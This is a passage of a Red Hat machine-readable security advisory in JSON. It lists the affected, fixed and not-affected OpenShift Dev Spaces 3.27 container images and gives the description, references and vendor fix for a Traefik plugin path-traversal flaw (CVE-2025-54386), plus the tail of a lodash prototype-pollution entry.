"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-54386",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-08-02T00:00:54.513784+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2386070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Traefik\u0027s plugin installation mechanism. This vulnerability allows remote code execution, privilege escalation, persistence, or application-level denial of service via a crafted ZIP archive exploiting a path traversal vector.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "traefik: Traefik\u0027s Client Plugin is Vulnerable to Path Traversal, Arbitrary File Overwrites and Remote Code Execution",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-54386"
},
{
"category": "external",
"summary": "RHBZ#2386070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2386070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-54386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54386"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-54386",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54386"
},
{
"category": "external",
"summary": "https://github.com/traefik/plugin-service/pull/71",
"url": "https://github.com/traefik/plugin-service/pull/71"
},
{
"category": "external",
"summary": "https://github.com/traefik/plugin-service/pull/72",
"url": "https://github.com/traefik/plugin-service/pull/72"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/commit/5ef853a0c53068f69a6c229a5815a0dc6e0a8800",
"url": "https://github.com/traefik/traefik/commit/5ef853a0c53068f69a6c229a5815a0dc6e0a8800"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/pull/11911",
"url": "https://github.com/traefik/traefik/pull/11911"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v2.11.28",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.28"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/security/advisories/GHSA-q6gg-9f92-r9wg",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-q6gg-9f92-r9wg"
}
],
"release_date": "2025-08-01T23:32:21.747000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
